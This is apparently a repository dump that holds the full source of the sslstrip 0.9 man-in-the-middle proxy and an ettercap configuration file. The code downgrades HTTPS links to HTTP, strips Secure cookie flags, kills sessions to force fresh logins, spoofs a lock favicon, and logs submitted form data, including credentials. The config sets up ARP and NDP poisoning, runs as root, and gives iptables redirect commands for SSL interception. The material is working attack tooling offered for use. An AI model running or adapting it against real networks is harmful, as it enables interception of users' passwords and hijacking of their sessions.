    print "\nsslstrip " + gVersion + " by Moxie Marlinspike"
    print "Usage: sslstrip \n"
    print "Options:"
    print "-w , --write= Specify file to log to (optional)."
    print "-p , --post Log only SSL POSTs. (default)"
    print "-s , --ssl Log all SSL traffic to and from server."
    print "-a , --all Log all SSL and HTTP traffic to and from server."
    print "-l , --listen= Port to listen on (default 10000)."
    print "-f , --favicon Substitute a lock favicon on secure requests."
    print "-k , --killsessions Kill sessions in progress."
    print "-h Print this help message."
    print ""

def parseOptions(argv):
    logFile = 'sslstrip.log'
    logLevel = logging.WARNING
    listenPort = 10000
    spoofFavicon = False
    killSessions = False

    try:
        opts, args = getopt.getopt(argv, "hw:l:psafk",
                                   ["help", "write=", "post", "ssl", "all", "listen=",
                                    "favicon", "killsessions"])

        for opt, arg in opts:
            if opt in ("-h", "--help"):
                usage()
                sys.exit()
            elif opt in ("-w", "--write"):
                logFile = arg
            elif opt in ("-p", "--post"):
                logLevel = logging.WARNING
            elif opt in ("-s", "--ssl"):
                logLevel = logging.INFO
            elif opt in ("-a", "--all"):
                logLevel = logging.DEBUG
            elif opt in ("-l", "--listen"):
                listenPort = arg
            elif opt in ("-f", "--favicon"):
                spoofFavicon = True
            elif opt in ("-k", "--killsessions"):
                killSessions = True

        return (logFile, logLevel, listenPort, spoofFavicon, killSessions)

    except getopt.GetoptError:
        usage()
        sys.exit(2)

def main(argv):
    (logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv)

    logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s',
                        filename=logFile, filemode='w')

    URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
    CookieCleaner.getInstance().setEnabled(killSessions)

    strippingFactory = http.HTTPFactory(timeout=10)
    strippingFactory.protocol = StrippingProxy

    reactor.listenTCP(int(listenPort), strippingFactory)

    print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..."

    reactor.run()

if __name__ == '__main__':
    main(sys.argv[1:])

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/ClientRequest.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import urlparse, logging, os, sys, random

from twisted.web.http import Request
from twisted.web.http import HTTPChannel
from twisted.web.http import HTTPClient

from twisted.internet import ssl
from twisted.internet import defer
from twisted.internet import reactor
from twisted.internet.protocol import ClientFactory

from ServerConnectionFactory import ServerConnectionFactory
from ServerConnection import ServerConnection
from SSLServerConnection import SSLServerConnection
from URLMonitor import URLMonitor
from CookieCleaner import CookieCleaner
from DnsCache import DnsCache

class ClientRequest(Request):

    ''' This class represents incoming client requests and is essentially where
    the magic begins. Here we remove the client headers we dont like, and then
    respond with either favicon spoofing, session denial, or proxy through HTTP
    or SSL to the server.
    '''

    def __init__(self, channel, queued, reactor=reactor):
        Request.__init__(self, channel, queued)
        self.reactor = reactor
        self.urlMonitor = URLMonitor.getInstance()
        self.cookieCleaner = CookieCleaner.getInstance()
        self.dnsCache = DnsCache.getInstance()
        # self.uniqueId = random.randint(0, 10000)

    def cleanHeaders(self):
        headers = self.getAllHeaders().copy()

        if 'accept-encoding' in headers:
            del headers['accept-encoding']

        if 'if-modified-since' in headers:
            del headers['if-modified-since']

        if 'cache-control' in headers:
            del headers['cache-control']

        return headers

    def getPathFromUri(self):
        if (self.uri.find("http://") == 0):
            index = self.uri.find('/', 7)
            return self.uri[index:]

        return self.uri

    def getPathToLockIcon(self):
        if os.path.exists("lock.ico"): return "lock.ico"

        scriptPath = os.path.abspath(os.path.dirname(sys.argv[0]))
        scriptPath = os.path.join(scriptPath, "../share/sslstrip/lock.ico")

        if os.path.exists(scriptPath): return scriptPath

        logging.warning("Error: Could not find lock.ico")
        return "lock.ico"

    def handleHostResolvedSuccess(self, address):
        logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
        host = self.getHeader("host")
        headers = self.cleanHeaders()
        client = self.getClientIP()
        path = self.getPathFromUri()

        self.content.seek(0,0)
        postData = self.content.read()
        url = 'http://' + host + path

        self.dnsCache.cacheResolution(host, address)

        if (not self.cookieCleaner.isClean(self.method, client, host, headers)):
            logging.debug("Sending expired cookies...")
            self.sendExpiredCookies(host, path, self.cookieCleaner.getExpireHeaders(self.method, client,
                                                                                    host, headers, path))
        elif (self.urlMonitor.isSecureFavicon(client, path)):
            logging.debug("Sending spoofed favicon response...")
            self.sendSpoofedFaviconResponse()
        elif (self.urlMonitor.isSecureLink(client, url)):
            logging.debug("Sending request via SSL...")
            self.proxyViaSSL(address, self.method, path, postData, headers,
                             self.urlMonitor.getSecurePort(client, url))
        else:
            logging.debug("Sending request via HTTP...")
            self.proxyViaHTTP(address, self.method, path, postData, headers)

    def handleHostResolvedError(self, error):
        logging.warning("Host resolution error: " + str(error))
        self.finish()

    def resolveHost(self, host):
        address = self.dnsCache.getCachedAddress(host)

        if address != None:
            logging.debug("Host cached.")
            return defer.succeed(address)
        else:
            logging.debug("Host not cached.")
            return reactor.resolve(host)

    def process(self):
        logging.debug("Resolving host: %s" % (self.getHeader('host')))
        host = self.getHeader('host')
        deferred = self.resolveHost(host)

        deferred.addCallback(self.handleHostResolvedSuccess)
        deferred.addErrback(self.handleHostResolvedError)

    def proxyViaHTTP(self, host, method, path, postData, headers):
        connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
        connectionFactory.protocol = ServerConnection
        self.reactor.connectTCP(host, 80, connectionFactory)

    def proxyViaSSL(self, host, method, path, postData, headers, port):
        clientContextFactory = ssl.ClientContextFactory()
        connectionFactory = ServerConnectionFactory(method, path, postData, headers, self)
        connectionFactory.protocol = SSLServerConnection
        self.reactor.connectSSL(host, port, connectionFactory, clientContextFactory)

    def sendExpiredCookies(self, host, path, expireHeaders):
        self.setResponseCode(302, "Moved")
        self.setHeader("Connection", "close")
        self.setHeader("Location", "http://" + host + path)

        for header in expireHeaders:
            self.setHeader("Set-Cookie", header)

        self.finish()

    def sendSpoofedFaviconResponse(self):
        icoFile = open(self.getPathToLockIcon())

        self.setResponseCode(200, "OK")
        self.setHeader("Content-type", "image/x-icon")
        self.write(icoFile.read())

        icoFile.close()
        self.finish()

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/CookieCleaner.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2011 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
import string

class CookieCleaner:
    '''This class cleans cookies we haven't seen before. The basic idea is to
    kill sessions, which isn't entirely straight-forward. Since we want this to
    be generalized, there's no way for us to know exactly what cookie we're trying
    to kill, which also means we don't know what domain or path it has been set for.

    The rule with cookies is that specific overrides general. So cookies that are
    set for mail.foo.com override cookies with the same name that are set for .foo.com,
    just as cookies that are set for foo.com/mail override cookies with the same name
    that are set for foo.com/

    The best we can do is guess, so we just try to cover our bases by expiring cookies
    in a few different ways. The most obvious thing to do is look for individual cookies
    and nail the ones we haven't seen coming from the server, but the problem is that cookies are often
    set by JavaScript instead of a Set-Cookie header, and if we block those the site
    will think cookies are disabled in the browser. So we do the expirations and whitelisting
    based on client,server tuples. The first time a client hits a server, we kill whatever
    cookies we see then. After that, we just let them through. Not perfect, but pretty effective.

    '''

    _instance = None

    def getInstance():
        if CookieCleaner._instance == None:
            CookieCleaner._instance = CookieCleaner()

        return CookieCleaner._instance

    getInstance = staticmethod(getInstance)

    def __init__(self):
        self.cleanedCookies = set();
        self.enabled = False

    def setEnabled(self, enabled):
        self.enabled = enabled

    def isClean(self, method, client, host, headers):
        if method == "POST": return True
        if not self.enabled: return True
        if not self.hasCookies(headers): return True

        return (client, self.getDomainFor(host)) in self.cleanedCookies

    def getExpireHeaders(self, method, client, host, headers, path):
        domain = self.getDomainFor(host)
        self.cleanedCookies.add((client, domain))

        expireHeaders = []

        for cookie in headers['cookie'].split(";"):
            cookie = cookie.split("=")[0].strip()
            expireHeadersForCookie = self.getExpireCookieStringFor(cookie, host, domain, path)
            expireHeaders.extend(expireHeadersForCookie)

        return expireHeaders

    def hasCookies(self, headers):
        return 'cookie' in headers

    def getDomainFor(self, host):
        hostParts = host.split(".")
        return "." + hostParts[-2] + "." + hostParts[-1]

    def getExpireCookieStringFor(self, cookie, host, domain, path):
        pathList = path.split("/")
        expireStrings = list()

        expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + domain +
                             ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        expireStrings.append(cookie + "=" + "EXPIRED;Path=/;Domain=" + host +
                             ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        if len(pathList) > 2:
            expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
                                 domain + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

            expireStrings.append(cookie + "=" + "EXPIRED;Path=/" + pathList[1] + ";Domain=" +
                                 host + ";Expires=Mon, 01-Jan-1990 00:00:00 GMT\r\n")

        return expireStrings

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/DnsCache.py:
--------------------------------------------------------------------------------

class DnsCache:

    '''
    The DnsCache maintains a cache of DNS lookups, mirroring the browser experience.
    '''

    _instance = None

    def __init__(self):
        self.cache = {}

    def cacheResolution(self, host, address):
        self.cache[host] = address

    def getCachedAddress(self, host):
        if host in self.cache:
            return self.cache[host]

        return None

    def getInstance():
        if DnsCache._instance == None:
            DnsCache._instance = DnsCache()

        return DnsCache._instance

    getInstance = staticmethod(getInstance)

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/SSLServerConnection.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging, re, string

from ServerConnection import ServerConnection

class SSLServerConnection(ServerConnection):

    '''
    For SSL connections to a server, we need to do some additional stripping. First we need
    to make note of any relative links, as the server will be expecting those to be requested
    via SSL as well. We also want to slip our favicon in here and kill the secure bit on cookies.
    '''

    cookieExpression = re.compile(r"([ \w\d:#@%/;$()~_?\+-=\\\.&]+); ?Secure", re.IGNORECASE)
    cssExpression = re.compile(r"url\(([\w\d:#@%/;$~_?\+-=\\\.&]+)\)", re.IGNORECASE)
    iconExpression = re.compile(r"", re.IGNORECASE)
    linkExpression = re.compile(r"<((a)|(link)|(img)|(script)|(frame)) .*((href)|(src))=\"([\w\d:#@%/;$()~_?\+-=\\\.&]+)\".*>", re.IGNORECASE)
    headExpression = re.compile(r"", re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        ServerConnection.__init__(self, command, uri, postData, headers, client)

    def getLogLevel(self):
        return logging.INFO

    def getPostPrefix(self):
        return "SECURE POST"

    def handleHeader(self, key, value):
        if (key.lower() == 'set-cookie'):
            value = SSLServerConnection.cookieExpression.sub("\g<1>", value)

        ServerConnection.handleHeader(self, key, value)

    def stripFileFromPath(self, path):
        (strippedPath, lastSlash, file) = path.rpartition('/')
        return strippedPath

    def buildAbsoluteLink(self, link):
        absoluteLink = ""

        if ((not link.startswith('http')) and (not link.startswith('/'))):
            absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link

            logging.debug("Found path-relative link in secure transmission: " + link)
            logging.debug("New Absolute path-relative link: " + absoluteLink)
        elif not link.startswith('http'):
            absoluteLink = "http://"+self.headers['host']+link

            logging.debug("Found relative link in secure transmission: " + link)
            logging.debug("New Absolute link: " + absoluteLink)

        if not absoluteLink == "":
            absoluteLink = absoluteLink.replace('&', '&')
            self.urlMonitor.addSecureLink(self.client.getClientIP(), absoluteLink);

    def replaceCssLinks(self, data):
        iterator = re.finditer(SSLServerConnection.cssExpression, data)

        for match in iterator:
            self.buildAbsoluteLink(match.group(1))

        return data

    def replaceFavicon(self, data):
        match = re.search(SSLServerConnection.iconExpression, data)

        if (match != None):
            data = re.sub(SSLServerConnection.iconExpression,
                          "", data)
        else:
            data = re.sub(SSLServerConnection.headExpression,
                          "", data)

        return data

    def replaceSecureLinks(self, data):
        data = ServerConnection.replaceSecureLinks(self, data)
        data = self.replaceCssLinks(data)

        if (self.urlMonitor.isFaviconSpoofing()):
            data = self.replaceFavicon(data)

        iterator = re.finditer(SSLServerConnection.linkExpression, data)

        for match in iterator:
            self.buildAbsoluteLink(match.group(10))

        return data

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/ServerConnection.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging, re, string, random, zlib, gzip, StringIO

from twisted.web.http import HTTPClient
from URLMonitor import URLMonitor

class ServerConnection(HTTPClient):

    ''' The server connection is where we do the bulk of the stripping. Everything that
    comes back is examined. The headers we don't like are removed, and the links are stripped
    from HTTPS to HTTP.
    '''

    urlExpression = re.compile(r"(https://[\w\d:#@%/;$()~_?\+-=\\\.&]*)", re.IGNORECASE)
    urlType = re.compile(r"https://", re.IGNORECASE)
    urlExplicitPort = re.compile(r'https://([a-zA-Z0-9.]+):[0-9]+/', re.IGNORECASE)

    def __init__(self, command, uri, postData, headers, client):
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client
        self.urlMonitor = URLMonitor.getInstance()
        self.isImageRequest = False
        self.isCompressed = False
        self.contentLength = None
        self.shutdownComplete = False

    def getLogLevel(self):
        return logging.DEBUG

    def getPostPrefix(self):
        return "POST"

    def sendRequest(self):
        logging.log(self.getLogLevel(), "Sending Request: %s %s" % (self.command, self.uri))
        self.sendCommand(self.command, self.uri)

    def sendHeaders(self):
        for header, value in self.headers.items():
            logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
            self.sendHeader(header, value)

        self.endHeaders()

    def sendPostData(self):
        logging.warning(self.getPostPrefix() + " Data (" + self.headers['host'] + "):\n" + str(self.postData))
        self.transport.write(self.postData)

    def connectionMade(self):
        logging.log(self.getLogLevel(), "HTTP connection made.")
        self.sendRequest()
        self.sendHeaders()

        if (self.command == 'POST'):
            self.sendPostData()

    def handleStatus(self, version, code, message):
        logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
        self.client.setResponseCode(int(code), message)

    def handleHeader(self, key, value):
        logging.log(self.getLogLevel(), "Got server header: %s:%s" % (key, value))

        if (key.lower() == 'location'):
            value = self.replaceSecureLinks(value)

        if (key.lower() == 'content-type'):
            if (value.find('image') != -1):
                self.isImageRequest = True
                logging.debug("Response is image content, not scanning...")

        if (key.lower() == 'content-encoding'):
            if (value.find('gzip') != -1):
                logging.debug("Response is compressed...")
                self.isCompressed = True
        elif (key.lower() == 'content-length'):
            self.contentLength = value
        elif (key.lower() == 'set-cookie'):
            self.client.responseHeaders.addRawHeader(key, value)
        else:
            self.client.setHeader(key, value)

    def handleEndHeaders(self):
        if (self.isImageRequest and self.contentLength != None):
            self.client.setHeader("Content-Length", self.contentLength)

        if self.length == 0:
            self.shutdown()

    def handleResponsePart(self, data):
        if (self.isImageRequest):
            self.client.write(data)
        else:
            HTTPClient.handleResponsePart(self, data)

    def handleResponseEnd(self):
        if (self.isImageRequest):
            self.shutdown()
        else:
            HTTPClient.handleResponseEnd(self)

    def handleResponse(self, data):
        if (self.isCompressed):
            logging.debug("Decompressing content...")
            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()

        logging.log(self.getLogLevel(), "Read from server:\n" + data)

        data = self.replaceSecureLinks(data)

        if (self.contentLength != None):
            self.client.setHeader('Content-Length', len(data))

        self.client.write(data)
        self.shutdown()

    def replaceSecureLinks(self, data):
        iterator = re.finditer(ServerConnection.urlExpression, data)

        for match in iterator:
            url = match.group()

            logging.debug("Found secure reference: " + url)

            url = url.replace('https://', 'http://', 1)
            url = url.replace('&', '&')
            self.urlMonitor.addSecureLink(self.client.getClientIP(), url)

        data = re.sub(ServerConnection.urlExplicitPort, r'http://\1/', data)
        return re.sub(ServerConnection.urlType, 'http://', data)

    def shutdown(self):
        if not self.shutdownComplete:
            self.shutdownComplete = True
            self.client.finish()
            self.transport.loseConnection()

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/ServerConnectionFactory.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
from twisted.internet.protocol import ClientFactory

class ServerConnectionFactory(ClientFactory):

    def __init__(self, command, uri, postData, headers, client):
        self.command = command
        self.uri = uri
        self.postData = postData
        self.headers = headers
        self.client = client

    def buildProtocol(self, addr):
        return self.protocol(self.command, self.uri, self.postData, self.headers, self.client)

    def clientConnectionFailed(self, connector, reason):
        logging.debug("Server connection failed.")

        destination = connector.getDestination()

        if (destination.port != 443):
            logging.debug("Retrying via SSL")
            self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443)
        else:
            self.client.finish()

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/StrippingProxy.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

from twisted.web.http import HTTPChannel
from ClientRequest import ClientRequest

class StrippingProxy(HTTPChannel):
    '''sslstrip is, at heart, a transparent proxy server that does some unusual things.
    This is the basic proxy server class, where we get callbacks for GET and POST methods.
    We then proxy these out using HTTP or HTTPS depending on what information we have about
    the (connection, client_address) tuple in our cache.
    '''

    requestFactory = ClientRequest

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/URLMonitor.py:
--------------------------------------------------------------------------------
# Copyright (c) 2004-2009 Moxie Marlinspike
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import re

class URLMonitor:

    '''
    The URL monitor maintains a set of (client, url) tuples that correspond to requests which the
    server is expecting over SSL. It also keeps track of secure favicon urls.
    '''

    # Start the arms race, and end up here...
    javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")]
    _instance = None

    def __init__(self):
        self.strippedURLs = set()
        self.strippedURLPorts = {}
        self.faviconReplacement = False

    def isSecureLink(self, client, url):
        for expression in URLMonitor.javascriptTrickery:
            if (re.match(expression, url)):
                return True

        return (client,url) in self.strippedURLs

    def getSecurePort(self, client, url):
        if (client,url) in self.strippedURLs:
            return self.strippedURLPorts[(client,url)]
        else:
            return 443

    def addSecureLink(self, client, url):
        methodIndex = url.find("//") + 2
        method = url[0:methodIndex]

        pathIndex = url.find("/", methodIndex)
        host = url[methodIndex:pathIndex]
        path = url[pathIndex:]

        port = 443
        portIndex = host.find(":")

        if (portIndex != -1):
            host = host[0:portIndex]
            port = host[portIndex+1:]
            if len(port) == 0:
                port = 443

        url = method + host + path

        self.strippedURLs.add((client, url))
        self.strippedURLPorts[(client, url)] = int(port)

    def setFaviconSpoofing(self, faviconSpoofing):
        self.faviconSpoofing = faviconSpoofing

    def isFaviconSpoofing(self):
        return self.faviconSpoofing

    def isSecureFavicon(self, client, url):
        return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))

    def getInstance():
        if URLMonitor._instance == None:
            URLMonitor._instance = URLMonitor()

        return URLMonitor._instance

    getInstance = staticmethod(getInstance)

--------------------------------------------------------------------------------
/bin/Utils/sslstrip-0.9/sslstrip/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/r00t-3xp10it/morpheus/5d81c9ea27efe381a1428466cfaf76cdd049680c/bin/Utils/sslstrip-0.9/sslstrip/__init__.py

--------------------------------------------------------------------------------
/bin/etter.conf:
--------------------------------------------------------------------------------
############################################################################
#                                                                          #
#  ettercap -- etter.conf -- configuration file                            #
#                                                                          #
#  Copyright (C) ALoR & NaGA                                               #
#                                                                          #
#  This program is free software; you can redistribute it and/or modify    #
#  it under the terms of the GNU General Public License as published by    #
#  the Free Software Foundation; either version 2 of the License, or       #
#  (at your option) any later version.                                     #
#                                                                          #
#                                                                          #
#  [ DEFAULT privs:65534]                                                  #
############################################################################

[privs]
ec_uid = 0                # nobody is the default
ec_gid = 0                # nobody is the default

[mitm]
arp_storm_delay = 10         # milliseconds
arp_poison_smart = 0         # boolean
arp_poison_warm_up = 1       # seconds
arp_poison_delay = 10        # seconds
arp_poison_icmp = 1          # boolean
arp_poison_reply = 1         # boolean
arp_poison_request = 0       # boolean
arp_poison_equal_mac = 1     # boolean
dhcp_lease_time = 1800       # seconds
port_steal_delay = 10        # seconds
port_steal_send_delay = 2000 # microseconds
ndp_poison_warm_up = 1       # seconds
ndp_poison_delay = 5         # seconds
ndp_poison_send_delay = 1500 # microseconds
ndp_poison_icmp = 1          # boolean
ndp_poison_equal_mac = 1     # boolean
icmp6_probe_delay = 3        # seconds

[connections]
connection_timeout = 300     # seconds
connection_idle = 5          # seconds
connection_buffer = 10000    # bytes
connect_timeout = 5          # seconds

[stats]
sampling_rate = 50           # number of packets

[misc]
close_on_eof = 1             # boolean value
store_profiles = 1           # 0 = disabled; 1 = all; 2 = local; 3 = remote
aggressive_dissectors = 1    # boolean value
skip_forwarded_pcks = 1      # boolean value
checksum_check = 0           # boolean value
submit_fingerprint = 0       # boolean value (set if you want ettercap to submit unknown finger prints)
checksum_warning = 0         # boolean value (valid only if checksum_check is 1)
sniffing_at_startup = 1      # boolean value

############################################################################
#
# You can specify what DISSECTORS are to be enabled or not...
#
# e.g.:  ftp = 21         enabled on port 21 (tcp is implicit)
#        ftp = 2345       enabled on non standard port
#        ftp = 21,453     enabled on port 21 and 453
#        ftp = 0          disabled
#
# NOTE: some dissectors have multiple default ports, if you specify a new
#       one, all the default ports will be overwritten
#
#

#dissector                default port

[dissectors]
ftp = 21                  # tcp 21
ssh = 22                  # tcp 22
telnet = 23               # tcp 23
smtp = 25                 # tcp 25
dns = 53                  # udp 53
dhcp = 67                 # udp 68
http = 80                 # tcp 80
ospf = 89                 # ip 89 (IPPROTO 0x59)
pop3 = 110                # tcp 110
#portmap = 111            # tcp / udp
vrrp = 112                # ip 112 (IPPROTO 0x70)
nntp = 119                # tcp 119
smb = 139,445             # tcp 139 445
imap = 143,220            # tcp 143 220
snmp = 161                # udp 161
bgp = 179                 # tcp 179
ldap = 389                # tcp 389
https = 443               # tcp 443
ssmtp = 465               # tcp 465
rlogin = 512,513          # tcp 512 513
rip = 520                 # udp 520
nntps = 563               # tcp 563
ldaps = 636               # tcp 636
telnets = 992             # tcp 992
imaps = 993               # tcp 993
ircs = 994                # tcp 994
pop3s = 995               # tcp 995
socks = 1080              # tcp 1080
radius = 1645,1646        # udp 1645 1646
msn = 1863                # tcp 1863
cvs = 2401                # tcp 2401
mysql = 3306              # tcp 3306
icq = 5190                # tcp 5190
ymsg = 5050               # tcp 5050
mdns = 5353               # udp 5353
vnc = 5900,5901,5902,5903 # tcp 5900 5901 5902 5903
x11 = 6000,6001,6002,6003 # tcp 6000 6001 6002 6003
irc = 6666,6667,6668,6669 # tcp 6666 6667 6668 6669
gg = 8074                 # tcp 8074
proxy = 8080              # tcp 8080
rcon = 27015,27960        # udp 27015 27960
ppp = 34827               # special case ;) this is the Net Layer code
TN3270 = 23,992           # tcp 23 992

#
# you can change the colors of the curses GUI.
# here is a list of values:
#  0 Black   4 Blue
#  1 Red     5 Magenta
#  2 Green   6 Cyan
#  3 Yellow  7 White
#
[curses]
color_bg = 0
color_fg = 7
color_join1 = 2
color_join2 = 4
color_border = 7
color_title = 3
color_focus = 6
color_menu_bg = 4
color_menu_fg = 6
color_window_bg = 4
color_window_fg = 7
color_selection_bg = 6
color_selection_fg = 6
color_error_bg = 1
color_error_fg = 3
color_error_border = 3

#
# This section includes all the configurations that need a string as a
# parameter such as the redirect command for SSL mitm attack.
#
[strings]

# the default encoding to be used for the UTF-8 visualization
utf8_encoding = "ISO-8859-1"


# the command used by the remote_browser plugin
# remote_browser = "xdg-open http://%host%url"
# remote_browser = "iceweasel -remote openurl http://%host%url"
remote_browser = "firefox -remote openurl http://%host%url"


#####################################
#       redir_command_on/off
#####################################
# you must provide a valid script for your operating system in order to have
# the SSL dissection available
# note that the cleanup script is executed without enough privileges (because
# they are dropped on startup). so you have to either: provide a setuid program
# or set the ec_uid to 0, in order to be sure the cleanup script will be
# executed properly
# NOTE: the script must fit into one line with a maximum of 255 characters

#---------------
#     Linux
#---------------

# if you use ipchains:
#redir_command_on = "ipchains -A input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"
#redir_command_off = "ipchains -D input -i %iface -p tcp -s 0/0 -d 0/0 %port -j REDIRECT %rport"

# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#---------------
#    Mac Os X
#---------------

# quick and dirty way:
#redir_command_on = "ipfw -q add set %set fwd 127.0.0.1,%rport tcp from any to any %port in via %iface"
#redir_command_off = "ipfw -q delete set %set"

# a better solution is to use a script that keeps track of the rules inserted
# and then deletes them on exit:

# redir_command_on:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
#    ipfw -q add `head -n 1 osx_ipfw_rules` fwd 127.0.0.1,$1 tcp from any to any $2 in via $3
# else
#    ipfw add fwd 127.0.0.1,$1 tcp from any to any $2 in via $3 | cut -d " " -f 1 >> /tmp/osx_ipfw_rules
# fi
# ----- cut here -------

# redir_command_off:
# ----- cut here -------
# #!/bin/sh
# if [ -a "/tmp/osx_ipfw_rules" ]; then
#    ipfw -q delete `head -n 1 /tmp/osx_ipfw_rules`
#    rm -f /tmp/osx_ipfw_rules
# fi
# ----- cut here -------

#---------------
#   FreeBSD
#---------------

# Before OF can be used, make sure the kernel module has been
